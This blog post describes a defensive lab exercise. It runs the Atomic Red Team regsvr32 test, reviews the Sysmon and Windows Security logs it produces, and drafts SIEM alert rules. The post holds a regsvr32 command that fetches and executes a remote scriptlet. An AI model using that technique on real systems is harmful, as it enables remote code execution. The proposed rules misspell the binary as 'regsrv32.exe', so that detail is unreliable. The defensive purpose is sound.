Detecting Execution in a windows Environment

In my last post,  we saw how we can setup DetectionLab, a tool with cyber defenders in mind. In this post we hope to see it in action. We will recreate Red Canary’s exercise for a very simple Execution Tactic using regsvr32.exe

After execution, we will collect logs generated by this attack vector and create rules for it to automate triggering. This way the alert will come to us and not the other way around.

Firstly,

What is regsvr32.exe?
As Per MITRE’s definition, “Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.”

What does object linking and embedding controls mean?
Think about it as the link between two applications that facilitates data insertion. Now that is a pretty convenient way for a bad actor to execute malicious code once they are in the system.

Prerequisites:
-For the purposes of this demonstration, we have assumed that the user has unknowingly downloaded a word file that contains a macro.
-The user has the opened the word file and enabled macro execution. 

Usually it’s after this step that the bad actors advance in the attack life cycle. The macro triggers the command prompt (cmd.exe) and the malicious command (regsvr32.exe) is executed. In our example, we execute this command directly on our command prompt and observe what happens. 

We log in to the windows 10 workstation that is acting as the user’s laptop. We open command prompt and run powershell.exe. Next and execute the command below.
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll

This command reaches out to a remote website. For the purposes of demonstration, it executes calc.exe which is windows calculator. This could have been a RAT or a keylogger. The execution stage is completed.

Now let’s see what events got triggered.We login to the splunk console and search for events in the last hour. We observe Sysmon and Windows Security Audit logs have a few entries

For Sysmon, what did it log?

1-      Network Connection Detected

04/01/2020 02:36:43 AM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=3 EventType=4 Type=Information ComputerName=win10.windomain.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Network connection detected (rule: NetworkConnect) OpCode=Info RecordNumber=15371 Keywords=None Message=Network connection detected: RuleName: technique_id=T1117,technique_name=Regsvr32 UtcTime: 2020-04-01 02:36:42.894 ProcessGuid: {f26a5612-fe39-5e83-0000-00106fd23b00} ProcessId: 1448 Image: C:\Windows\System32\regsvr32.exe User: WIN10\vagrant Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 10.0.2.15 SourceHostname: win10.windomain.local SourcePort: 51196 SourcePortName: DestinationIsIpv6: false DestinationIp: 72.21.91.29 DestinationHostname: DestinationPort: 80 DestinationPortName: http

2-      DNS Request sent

04/01/2020 02:36:42 AM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=22 EventType=4 Type=Information ComputerName=win10.windomain.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Dns query (rule: DnsQuery) OpCode=Info RecordNumber=15368 Keywords=None Message=Dns query: RuleName: UtcTime: 2020-04-01 02:36:43.476 ProcessGuid: {f26a5612-fe39-5e83-0000-00106fd23b00} ProcessId: 1448 QueryName: raw.githubusercontent.com QueryStatus: 0 QueryResults: type: 5 github.map.fastly.net;::ffff:151.101.208.133; Image: C:\Windows\System32\regsvr32.exe

3-      Process Created

04/01/2020 02:36:41 AM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information ComputerName=win10.windomain.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Process Create (rule: ProcessCreate) OpCode=Info RecordNumber=15365 Keywords=None Message=Process Create: RuleName: technique_id=T1117,technique_name=Regsvr32 UtcTime: 2020-04-01 02:36:41.785 ProcessGuid: {f26a5612-fe39-5e83-0000-00106fd23b00} ProcessId: 1448 Image: C:\Windows\System32\regsvr32.exe FileVersion: 10.0.18362.1 (WinBuild.160101.0800) Description: Microsoft(C) Register Server Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: REGSVR32.EXE CommandLine:C:\Windows\system32\regsvr32.exe/s /u /i:https://raw.githubusercontent.com/redcanaray/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll CurrentDirectory: C:\Users\ User: WIN10\vagrant LogonGuid: {f26a5612-f80c-5e83-0000-0020306a0200} LogonId: 0x26A30 TerminalSessionId: 1 IntegrityLevel: High Hashes: SHA1=8A00AD3F91F4DF913A49C6083F48F9530CCF5326,MD5=578BAB56836A3FE455FFC7883041825B,SHA256=8FFC7F80EFBF746E49F37EA3D140F042CF71EF20B4DA2A8F02688E79295DA11D,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F ParentProcessGuid: {f26a5612-fa7d-5e83-0000-001060ed1f00} ParentProcessId: 2892 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: powershell.exe

Furthermore, we observe the windows security event logging has logged an entry.

1- A new process has been created.

LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win10.windomain.local TaskCategory=Process Creation OpCode=Info RecordNumber=118234 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-2442856559-1527439232-1060400613-1000 Account Name: vagrant Account Domain: WIN10 Logon ID: 0x26A30 Target Subject: Security ID: S-1-0-0 Account Name: – Account Domain: – Logon ID: 0x0 Process Information: New Process ID: 0x5a8 New Process Name: C:\Windows\System32\regsvr32.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb4c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: “C:\Windows\system32\regsvr32.exe” /s /u /i:https://raw.githubusercontent.com/redcanaray/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll

2-A process has exited.

LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4689 EventType=0 Type=Information ComputerName=win10.windomain.local TaskCategory=Process Termination OpCode=Info RecordNumber=118235 Keywords=Audit Success Message=A process has exited. Subject: Security ID: S-1-5-21-2442856559-1527439232-1060400613-1000 Account Name: vagrant Account Domain: WIN10 Logon ID: 0x26A30 Process Information: Process ID: 0x5a8 Process Name: C:\Windows\System32\regsvr32.exe Exit Status: 0x5

Do note that process command line logging is not enabled by default by either of the two logging mechanisms i.e. Sysmon and Windows Security Logs. While our lab comes pre-configured with these configurations, enabling it in production is recommended. This article does a good job explaining how to achieve this.

Now that we have executed the attack and found the artifacts, our last step is to ensure we get alerted if this happens in real time. Note that the fieldname is different and can be customized depending on the SIEM solution you use. 

For SysMon we should monitor:

  1. AlertName=’Network connections detected’ AND processName CONTAINS “regsrv32.exe”
  2. ‘DNS Request sent’ with process name regsrv32.exe
  3. Process Created with regsrv32.exe and commnadline contains “http”

For Windows Security Logs:

  1. Windows Event 4688 with command line containing regsrv32.exe
  2. Windows Event 4689 with command line containing regsrv32.exe

These rules might generate noise if the sysadmins use this functionality. A good idea would be to eliminate the noisiest users that use  regsrv32.exe based on a month-long data set. 

Credits:
https://www.youtube.com/watch?v=7L8H2RsfscU
https://attack.mitre.org/techniques/T1117/
https://redcanary.com/blog/atomic-red-team-testing/

Leave a Comment

Your email address will not be published. Required fields are marked *